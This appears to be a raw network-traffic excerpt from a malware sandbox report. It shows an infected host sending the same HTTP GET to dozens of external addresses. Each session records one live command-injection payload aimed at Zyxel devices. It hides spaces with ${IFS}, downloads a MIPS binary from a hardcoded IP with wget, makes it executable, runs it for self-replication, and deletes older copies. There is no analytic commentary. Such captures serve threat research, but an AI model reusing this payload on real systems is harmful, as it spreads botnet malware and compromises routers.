                                            Jan 14, 2024 15:50:44.513048887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5776192.168.2.2336700145.241.67.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513060093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5777192.168.2.2338382119.153.125.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513097048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5778192.168.2.23536481.128.255.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513127089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5779192.168.2.2350160206.91.246.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513204098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5780192.168.2.2348612178.240.149.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513216972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5781192.168.2.2350430107.160.240.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513251066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5782192.168.2.234702861.243.21.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513262987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5783192.168.2.234736458.191.21.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513273001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5784192.168.2.2346664129.226.110.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513313055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5785192.168.2.2347328168.196.11.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513379097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5786192.168.2.235846090.153.26.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513401031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5787192.168.2.235173637.48.101.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513420105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5788192.168.2.2352552170.93.77.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513475895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5789192.168.2.234568892.237.114.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513504982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5790192.168.2.234535213.3.118.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513547897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5791192.168.2.2343886221.3.50.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513560057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5792192.168.2.2343120144.64.160.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513571024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5793192.168.2.2351808207.169.234.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513612032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5794192.168.2.2350286121.178.91.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513654947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5795192.168.2.2356684141.52.189.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513691902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5796192.168.2.2344738101.7.242.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513720989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5797192.168.2.2344140148.126.58.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513757944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5798192.168.2.2359462164.139.176.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513799906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5799192.168.2.235124272.247.202.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513822079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5800192.168.2.2359336143.149.72.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513844013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5801192.168.2.236010051.154.22.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513905048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5802192.168.2.2344370209.181.130.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513927937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5803192.168.2.2340350147.234.32.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513957977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5804192.168.2.2351290112.174.205.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.513972044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5805192.168.2.2335704179.7.6.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514000893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5806192.168.2.233770665.35.91.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514041901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5807192.168.2.234837482.51.196.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514081955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5808192.168.2.234562090.129.84.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514113903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5809192.168.2.2337478128.128.163.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514136076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5810192.168.2.2351642172.121.235.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514189959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5811192.168.2.233616212.248.218.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514205933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5812192.168.2.2351018221.104.122.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514240026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5813192.168.2.2334710150.68.169.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514277935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5814192.168.2.235032487.72.133.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514292955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5815192.168.2.233308042.71.59.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514339924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5816192.168.2.233390091.187.45.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514377117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5817192.168.2.2335526164.200.166.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514395952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5818192.168.2.234000895.124.220.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514452934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5819192.168.2.2348192197.67.112.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514471054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5820192.168.2.2349316142.35.170.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514497995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5821192.168.2.2356932192.68.169.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514498949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5822192.168.2.235960624.229.26.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514553070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5823192.168.2.2358226112.11.240.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514599085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5824192.168.2.234378490.171.185.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514626980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5825192.168.2.2359108204.45.208.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514668941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5826192.168.2.233877042.59.121.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514697075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5827192.168.2.2352490119.123.231.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514725924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5828192.168.2.234655232.10.26.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514755964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5829192.168.2.235124438.144.38.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514791965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5830192.168.2.2337630167.17.123.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514837980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5831192.168.2.2351282194.24.137.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514842987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5832192.168.2.2360064142.88.190.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514863968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5833192.168.2.2357878170.82.21.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514902115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5834192.168.2.234487499.40.30.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514931917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5835192.168.2.234683214.72.191.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514961004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5836192.168.2.2355242160.109.37.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.514991045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5837192.168.2.233325078.113.23.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515024900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5838192.168.2.234871035.106.237.181443
                                            TimestampBytes transferredDirectionData
